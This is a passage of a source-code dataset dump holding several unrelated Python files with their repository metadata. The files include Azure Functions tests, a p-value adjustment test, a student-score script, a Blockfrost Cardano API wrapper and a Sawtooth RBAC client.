] | null | null | null | UserFolder/__init__.py | legopitstop/User | b09ffaf9e9ee6dda85a7a3ca52d898b5c224117d | [
"MIT"
] | null | null | null | UserFolder/__init__.py | legopitstop/User | b09ffaf9e9ee6dda85a7a3ca52d898b5c224117d | [
"MIT"
] | null | null | null | from UserFolder.User import User | 32 | 32 | 0.875 | 5 | 32 | 5.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
681d19328e7478e3e91c292f0802db115c0e0ab2 | 23 | py | Python | nannotate/__init__.py | timkpaine/nannotate | 620fe249764a76489b319c0c7394b8aef1efd649 | [
"Apache-2.0"
] | 10 | 2018-06-01T16:21:48.000Z | 2018-10-19T19:42:19.000Z | nannotate/__init__.py | timkpaine/nannotate | 620fe249764a76489b319c0c7394b8aef1efd649 | [
"Apache-2.0"
] | 9 | 2018-06-05T04:27:51.000Z | 2018-10-05T14:34:19.000Z | nannotate/__init__.py | timkpaine/nannotate | 620fe249764a76489b319c0c7394b8aef1efd649 | [
"Apache-2.0"
] | 2 | 2019-10-18T07:01:35.000Z | 2019-11-27T17:54:21.000Z | from .annotate import * | 23 | 23 | 0.782609 | 3 | 23 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 23 | 1 | 23 | 23 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
68714a6b43c845f69b3673c77bb97bce36655fc6 | 5,998 | py | Python | tests/unittests/test_mock_durable_functions.py | gohar94/azure-functions-python-worker | 4322e53ddbcc1eea40c1b061b42653336d9003f6 | [
"MIT"
] | 277 | 2018-01-25T23:13:03.000Z | 2022-02-22T06:12:04.000Z | tests/unittests/test_mock_durable_functions.py | gohar94/azure-functions-python-worker | 4322e53ddbcc1eea40c1b061b42653336d9003f6 | [
"MIT"
] | 731 | 2018-01-18T18:54:38.000Z | 2022-03-29T00:01:46.000Z | tests/unittests/test_mock_durable_functions.py | YunchuWang/azure-functions-python-worker | 1f23e038a506c6412e4efbf07eb471a6afab0c2a | [
"MIT"
] | 109 | 2018-01-18T02:22:57.000Z | 2022-02-15T18:59:54.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from azure_functions_worker import protos
from azure_functions_worker import testutils
class TestDurableFunctions(testutils.AsyncTestCase):
durable_functions_dir = testutils.UNIT_TESTS_FOLDER / 'durable_functions'
async def test_mock_activity_trigger(self):
async with testutils.start_mockhost(
script_root=self.durable_functions_dir) as host:
func_id, r = await host.load_function('activity_trigger')
self.assertEqual(r.response.function_id, func_id)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
_, r = await host.invoke_function(
'activity_trigger', [
# According to Durable Python
# Activity Trigger's input must be json serializable
protos.ParameterBinding(
name='input',
data=protos.TypedData(
string='test single_word'
)
)
]
)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
self.assertEqual(
r.response.return_value,
protos.TypedData(json='"test single_word"')
)
async def test_mock_activity_trigger_no_anno(self):
async with testutils.start_mockhost(
script_root=self.durable_functions_dir) as host:
func_id, r = await host.load_function('activity_trigger_no_anno')
self.assertEqual(r.response.function_id, func_id)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
_, r = await host.invoke_function(
'activity_trigger_no_anno', [
# According to Durable Python
# Activity Trigger's input must be json serializable
protos.ParameterBinding(
name='input',
data=protos.TypedData(
string='test multiple words'
)
)
]
)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
self.assertEqual(
r.response.return_value,
protos.TypedData(json='"test multiple words"')
)
async def test_mock_activity_trigger_dict(self):
async with testutils.start_mockhost(
script_root=self.durable_functions_dir) as host:
func_id, r = await host.load_function('activity_trigger_dict')
self.assertEqual(r.response.function_id, func_id)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
_, r = await host.invoke_function(
'activity_trigger_dict', [
# According to Durable Python
# Activity Trigger's input must be json serializable
protos.ParameterBinding(
name='input',
data=protos.TypedData(
json='{"bird": "Crane"}'
)
)
]
)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
self.assertEqual(
r.response.return_value,
protos.TypedData(json='{"bird": "enarC"}')
)
async def test_mock_activity_trigger_int_to_float(self):
async with testutils.start_mockhost(
script_root=self.durable_functions_dir) as host:
func_id, r = await host.load_function(
'activity_trigger_int_to_float')
self.assertEqual(r.response.function_id, func_id)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
_, r = await host.invoke_function(
'activity_trigger_int_to_float', [
# According to Durable Python
# Activity Trigger's input must be json serializable
protos.ParameterBinding(
name='input',
data=protos.TypedData(
json=str(int(10))
)
)
]
)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
self.assertEqual(
r.response.return_value,
protos.TypedData(json='-11.0')
)
async def test_mock_orchestration_trigger(self):
async with testutils.start_mockhost(
script_root=self.durable_functions_dir) as host:
func_id, r = await host.load_function('orchestration_trigger')
self.assertEqual(r.response.function_id, func_id)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
_, r = await host.invoke_function(
'orchestration_trigger', [
protos.ParameterBinding(
name='context',
data=protos.TypedData(
string='Durable functions coming soon'
)
)
]
)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
self.assertEqual(
r.response.return_value,
protos.TypedData(json='Durable functions coming soon :)')
)
| 39.202614 | 77 | 0.523841 | 527 | 5,998 | 5.755218 | 0.170778 | 0.098912 | 0.105506 | 0.158259 | 0.850643 | 0.824926 | 0.776459 | 0.776459 | 0.776459 | 0.776459 | 0 | 0.001399 | 0.404135 | 5,998 | 152 | 78 | 39.460526 | 0.84723 | 0.067523 | 0 | 0.533333 | 0 | 0 | 0.078825 | 0.034038 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | false | 0 | 0.016667 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
68ac04f6134eeeb761fedf49540b8ac62e23b3f1 | 3,520 | py | Python | tests/.ipynb_checkpoints/scratch-checkpoint.py | UBC-MDS/p_toolkit_Python | d482736fb9a3bbca93fe0bc86cacf4dc6d5745ba | [
"MIT"
] | null | null | null | tests/.ipynb_checkpoints/scratch-checkpoint.py | UBC-MDS/p_toolkit_Python | d482736fb9a3bbca93fe0bc86cacf4dc6d5745ba | [
"MIT"
] | 3 | 2018-02-14T19:15:24.000Z | 2018-02-14T19:36:58.000Z | tests/.ipynb_checkpoints/scratch-checkpoint.py | UBC-MDS/p_toolkit_Python | d482736fb9a3bbca93fe0bc86cacf4dc6d5745ba | [
"MIT"
] | 4 | 2018-03-13T06:21:24.000Z | 2021-02-14T22:10:47.000Z | def test_p_adjust():
"""
The purpose of this test is evaluating the p_adjust with more real world data using Pandas dataframes under
different environments.
"""
d = {"p_value": [0.07], "bonf_value": [0.05], "bonf_significant": [False], "bh_value": [0.05],
"bh_significant": [False]}
df = pd.DataFrame(data=d)
df = df[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=[0.07], alpha=0.05)
test = test[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(df), "p_adjust 1 value vector, FALSE"
d = {"p_value": [0.01], "bonf_value": [0.05], "bonf_significant": [True], "bh_value": [0.05],
"bh_significant": [True]}
df = pd.DataFrame(data=d)
df = df[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=[0.01], alpha=0.05)
test = test[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(df), "p_adjust 1 value vector, TRUE"
d = {"Test": ["test 1", "test 2"], "p_value": [0.01, 0.03], "bonf_value": [0.025, 0.025],
"bonf_significant": [True, False], "bh_value": [0.025, 0.05], "bh_significant": [True, True]}
df = pd.DataFrame(data=d)
df = df[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=[0.01, 0.03], alpha=0.05)
test = test[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(df), "p_adjust 2 values vector "
###dataframe tests
d = {"Test": ["test 1"], "p_value": [0.01]}
df = pd.DataFrame(data=d)
ad = {"Test": ["test 1"], "p_value": [0.01], "bonf_value": [0.05], "bonf_significant": [True], "bh_value": [0.05],
"bh_significant": [True]}
adf = pd.DataFrame(data=ad)
adf = adf[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=df, pv_index="p_value", alpha=0.05)
test = test[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(adf), "p_adjust 2 values dataframe "
d = {"Test": ["test 1"], "p_value": [0.1]}
df = pd.DataFrame(data=d)
ad = {"Test": ["test 1"], "p_value": [0.1], "bonf_value": [0.05], "bonf_significant": [False], "bh_value": [0.05],
"bh_significant": [False]}
adf = pd.DataFrame(data=ad)
adf = adf[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=df, pv_index="p_value", alpha=0.05)
test = test[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
    assert test.equals(adf), "p_adjust 1 value dataframe, FALSE"
d = {"Test": ["test 1", "test 2"], "p_value": [0.01, 0.03]}
df = pd.DataFrame(data=d)
ad = {"Test": ["test 1", "test 2"], "p_value": [0.01, 0.03], "bonf_value": [0.025, 0.025],
"bonf_significant": [True, False], "bh_value": [0.025, 0.05], "bh_significant": [True, True]}
adf = pd.DataFrame(data=ad)
adf = adf[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=df, pv_index="p_value", alpha=0.05)
test = test[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(adf), "p_adjust 2 values dataframe "
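    # Cross-check (illustrative, not part of the p_adjust API): with m tests at
    # level alpha, Bonferroni compares every p-value against alpha / m, while
    # Benjamini-Hochberg compares the k-th smallest p-value against alpha * k / m.
    # For the frame above (p = [0.01, 0.03], alpha = 0.05) that gives
    # bonf_value = [0.025, 0.025] and bh_value = [0.025, 0.05], matching adf.
    assert [0.05 * k / 2 for k in (1, 2)] == [0.025, 0.05]
    assert [0.05 / 2] * 2 == [0.025, 0.025]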
# data is not empty
with pytest.raises(TypeError):
p_adjust() | 55.873016 | 118 | 0.618466 | 527 | 3,520 | 3.912713 | 0.102467 | 0.069835 | 0.046557 | 0.075655 | 0.892338 | 0.892338 | 0.892338 | 0.878758 | 0.878758 | 0.869059 | 0 | 0.046032 | 0.173011 | 3,520 | 63 | 119 | 55.873016 | 0.662315 | 0.046875 | 0 | 0.647059 | 0 | 0 | 0.393639 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.019608 | false | 0 | 0 | 0 | 0.019608 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d7c99ad632e2351980cb5e68c6371fda3b9176a0 | 40 | py | Python | henmedlib/i_o/__init__.py | schmitzhenninglmu/henmedlib | 196b63710f092470ab21173cfcc0b14e65778f33 | [
"MIT"
] | null | null | null | henmedlib/i_o/__init__.py | schmitzhenninglmu/henmedlib | 196b63710f092470ab21173cfcc0b14e65778f33 | [
"MIT"
] | null | null | null | henmedlib/i_o/__init__.py | schmitzhenninglmu/henmedlib | 196b63710f092470ab21173cfcc0b14e65778f33 | [
"MIT"
] | 1 | 2019-09-20T10:59:25.000Z | 2019-09-20T10:59:25.000Z | from .dicom import *
from .mha import *
| 13.333333 | 20 | 0.7 | 6 | 40 | 4.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 40 | 2 | 21 | 20 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d7ced5431bbfb81862e550056f6763f5c3529b7f | 3,611 | py | Python | Dictionaries/Dictionaries21.py | liyuanyuan11/Python | d94cc7ab39e56c6e24bfc741a30da77590d1d220 | [
"MIT"
] | null | null | null | Dictionaries/Dictionaries21.py | liyuanyuan11/Python | d94cc7ab39e56c6e24bfc741a30da77590d1d220 | [
"MIT"
] | null | null | null | Dictionaries/Dictionaries21.py | liyuanyuan11/Python | d94cc7ab39e56c6e24bfc741a30da77590d1d220 | [
"MIT"
] | null | null | null | studentList=[]
student = {"name": "李若瑜", "ID": "1", "score1": 95, "score2": 100, "score3": 96, "total": 291}
studentList.append(student)
student = {"name": "张子栋", "ID": "2", "score1": 93, "score2": 100, "score3": 95, "total": 288}
studentList.append(student)
student = {"name": "王小明", "ID": "3", "score1": 100, "score2": 94, "score3": 100, "total": 294}
studentList.append(student)


def printScoreTable(students):
    # Print one row per student under a common header.
    print("ID Name Chinese Math English Total")
    for s in students:
        print(s.get("ID"), " ", s.get("name"), " ", s.get("score1"), " ",
              s.get("score2"), " ", s.get("score3"), " ", s.get("total"))


print("The scores of " + str(len(studentList)) + " students have been recorded; they are:")
printScoreTable(studentList)
studentList[1]["score2"] = 98
studentList[1]["total"] = studentList[1]["score1"] + studentList[1]["score2"] + studentList[1]["score3"]
print("Student 2's math score was entered incorrectly and is corrected to 98.")
print("Student 2's corrected scores are:")
printScoreTable([studentList[1]])
print("Next, enter the scores of a new student.")
student = {}
student["name"] = input("Enter the student's name: ")
student["ID"] = input("Enter the student's ID: ")
# Store scores as numbers so the total and the sort below stay consistent.
student["score1"] = float(input("Enter the Chinese score: "))
student["score2"] = float(input("Enter the math score: "))
student["score3"] = float(input("Enter the English score: "))
student["total"] = student["score1"] + student["score2"] + student["score3"]
studentList.append(student)
print("The scores of " + str(len(studentList)) + " students have been recorded; they are:")
printScoreTable(studentList)
studentList.sort(key=lambda x: x["total"])
print("Student records sorted by total score from low to high:")
print("The scores of " + str(len(studentList)) + " students have been recorded; they are:")
printScoreTable(studentList)
studentList.sort(key=lambda x:x["total"],reverse=True) | 83.976744 | 193 | 0.660205 | 475 | 3,611 | 5.018947 | 0.117895 | 0.145973 | 0.151007 | 0.080537 | 0.780621 | 0.751258 | 0.751258 | 0.751258 | 0.751258 | 0.744128 | 0 | 0.049611 | 0.039878 | 3,611 | 43 | 194 | 83.976744 | 0.638016 | 0 | 0 | 0.581395 | 0 | 0 | 0.23505 | 0.005814 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.534884 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d7eac4ee74804326282aa33abb850a6a93181837 | 9,063 | py | Python | blockfrost/api/cardano/epochs.py | AstroWa3l/blockfrost-python | dd3661ee3b882cc2081292327adbbf2d61fda0f9 | [
"Apache-2.0"
] | 1 | 2021-12-13T22:28:45.000Z | 2021-12-13T22:28:45.000Z | blockfrost/api/cardano/epochs.py | AstroWa3l/blockfrost-python | dd3661ee3b882cc2081292327adbbf2d61fda0f9 | [
"Apache-2.0"
] | null | null | null | blockfrost/api/cardano/epochs.py | AstroWa3l/blockfrost-python | dd3661ee3b882cc2081292327adbbf2d61fda0f9 | [
"Apache-2.0"
] | null | null | null | import requests
from dataclasses import dataclass, field
from blockfrost.utils import request_wrapper, list_request_wrapper
@request_wrapper
def epoch_latest(self, **kwargs):
"""
Return the information about the latest, therefore current, epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1latest/get
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:returns object.
:rtype: Namespace
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/latest",
headers=self.default_headers
)
@request_wrapper
def epoch_latest_parameters(self, **kwargs):
"""
Return the protocol parameters for the latest epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1latest~1parameters/get
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:returns object.
:rtype: Namespace
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/latest/parameters",
headers=self.default_headers
)
@request_wrapper
def epoch(self, number: int, **kwargs):
"""
Return the content of the requested epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}/get
:param number: Number of the epoch.
:type number: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:returns object.
:rtype: Namespace
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}",
headers=self.default_headers
)
@list_request_wrapper
def epochs_next(self, number: int, **kwargs):
"""
Return the list of epochs following a specific epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1next/get
:param number: Number of the epoch.
:type number: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:returns A list of objects.
:rtype [Namespace]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/next",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@list_request_wrapper
def epochs_previous(self, number: int, **kwargs):
"""
Return the list of epochs preceding a specific epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1previous/get
:param number: Number of the epoch.
:type number: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:returns A list of objects.
:rtype [Namespace]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/previous",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
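# Caller-side sketch (illustrative, not part of this module): the count/page
# parameters documented above can be walked manually instead of passing
# gather_pages=True, assuming a fetch(page) callable that returns fewer than
# `count` items on its last page.
def _gather_all_pages(fetch, count=100):
    results = []
    page = 1
    while True:
        batch = fetch(page)
        results.extend(batch)
        if len(batch) < count:  # a short (or empty) page means we are done
            return results
        page += 1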
@list_request_wrapper
def epoch_stakes(self, number: int, **kwargs):
"""
Return the active stake distribution for the specified epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1stakes/get
:param number: Number of the epoch.
:type number: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:returns A list of objects.
:rtype [Namespace]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/stakes",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@list_request_wrapper
def epoch_pool_stakes(self, number: int, pool_id: str, **kwargs):
"""
Return the active stake distribution for the epoch specified by stake pool.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1stakes~1{pool_id}/get
:param number: Number of the epoch.
:type number: int
:param pool_id: Stake pool ID to filter.
    :type pool_id: str
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:returns A list of objects.
:rtype [Namespace]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/stakes/{pool_id}",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@list_request_wrapper
def epoch_blocks(self, number: int, **kwargs):
"""
Return the blocks minted for the epoch specified.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1blocks/get
:param number: Number of the epoch.
:type number: int
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:param order: Optional. "asc" or "desc". Default: "asc".
:type order: str
:returns A list of str objects.
:rtype [str]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/blocks",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@list_request_wrapper
def epoch_pool_blocks(self, number: int, pool_id: str, **kwargs):
"""
    Return the blocks minted for the epoch specified by stake pool.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1blocks~1{pool_id}/get
:param number: Number of the epoch.
:type number: int
:param pool_id: Stake pool ID to filter.
    :type pool_id: str
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:param order: Optional. "asc" or "desc". Default: "asc".
:type order: str
:returns A list of str objects.
:rtype [str]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/blocks/{pool_id}",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@request_wrapper
def epoch_protocol_parameters(self, number: int, **kwargs):
"""
Return the protocol parameters for the epoch specified.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1parameters/get
:param number: Number of the epoch.
:type number: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:returns object.
:rtype: Namespace
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/parameters",
headers=self.default_headers
)
| 34.071429 | 98 | 0.686086 | 1,217 | 9,063 | 5.03862 | 0.09203 | 0.035877 | 0.027723 | 0.034247 | 0.943412 | 0.928571 | 0.915199 | 0.903457 | 0.873614 | 0.839041 | 0 | 0.006677 | 0.206775 | 9,063 | 265 | 99 | 34.2 | 0.846293 | 0.667218 | 0 | 0.521739 | 0 | 0 | 0.144007 | 0.144007 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144928 | false | 0 | 0.043478 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d7ed15754e3e14ef5abed64decd85507892618df | 14,403 | py | Python | tests/blockchain/rbac_client.py | knagware9/sawtooth-next-directory | be80852e08d2b27e105d964c727509f2a974002d | [
"Apache-2.0"
] | 1 | 2019-04-14T20:16:59.000Z | 2019-04-14T20:16:59.000Z | tests/blockchain/rbac_client.py | crazyrex/sawtooth-next-directory | 210b581c8c92c307fab2f6d2b9a55526b56b790a | [
"Apache-2.0"
] | null | null | null | tests/blockchain/rbac_client.py | crazyrex/sawtooth-next-directory | 210b581c8c92c307fab2f6d2b9a55526b56b790a | [
"Apache-2.0"
] | 1 | 2018-12-07T10:55:08.000Z | 2018-12-07T10:55:08.000Z | # Copyright 2018 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
from base64 import b64decode
from uuid import uuid4
from rbac.common import addresser
from rbac.common.protobuf import user_state_pb2
from rbac.transaction_creation.user_transaction_creation import create_user
from rbac.transaction_creation import (
task_transaction_creation,
role_transaction_creation,
manager_transaction_creation,
)
from rbac.common.sawtooth.rest_client import RestClient
REST_ENDPOINT = "http://rest-api:8008"
class RbacClient(object):
def __init__(self, url, key):
if url is None:
url = REST_ENDPOINT
self._client = RestClient(base_url=url)
self._key = key
def return_state(self):
items = []
for item in self._client.list_state(subtree=addresser.NAMESPACE)["data"]:
if addresser.address_is(item["address"]) == addresser.AddressSpace.USER:
user_container = user_state_pb2.UserContainer()
user_container.ParseFromString(b64decode(item["data"]))
items.append((user_container, addresser.AddressSpace.USER))
return items
def create_user(self, key, name, user_name, user_id, manager_id=None):
batch_list, signature = create_user(
txn_key=key,
batch_key=self._key,
name=name,
user_name=user_name,
user_id=user_id,
metadata=uuid4().hex,
manager_id=manager_id,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def create_role(self, key, role_name, role_id, metadata, admins, owners):
batch_list, signature = role_transaction_creation.create_role(
txn_key=key,
batch_key=self._key,
role_name=role_name,
role_id=role_id,
metadata=metadata,
admins=admins,
owners=owners,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_update_manager(
self, key, proposal_id, user_id, new_manager_id, reason, metadata
):
batch_list, signature = manager_transaction_creation.propose_manager(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
user_id=user_id,
new_manager_id=new_manager_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_update_manager(self, key, proposal_id, reason, user_id, manager_id):
batch_list, signature = manager_transaction_creation.confirm_manager(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
reason=reason,
user_id=user_id,
manager_id=manager_id,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_update_manager(self, key, proposal_id, reason, user_id, manager_id):
batch_list, signature = manager_transaction_creation.reject_manager(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
reason=reason,
user_id=user_id,
manager_id=manager_id,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_admins(
self, key, proposal_id, role_id, user_id, reason, metadata
):
batch_list, signature = role_transaction_creation.propose_add_role_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_admins(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.confirm_add_role_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_admins(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.reject_add_role_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_owners(
self, key, proposal_id, role_id, user_id, reason, metadata
):
batch_list, signature = role_transaction_creation.propose_add_role_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
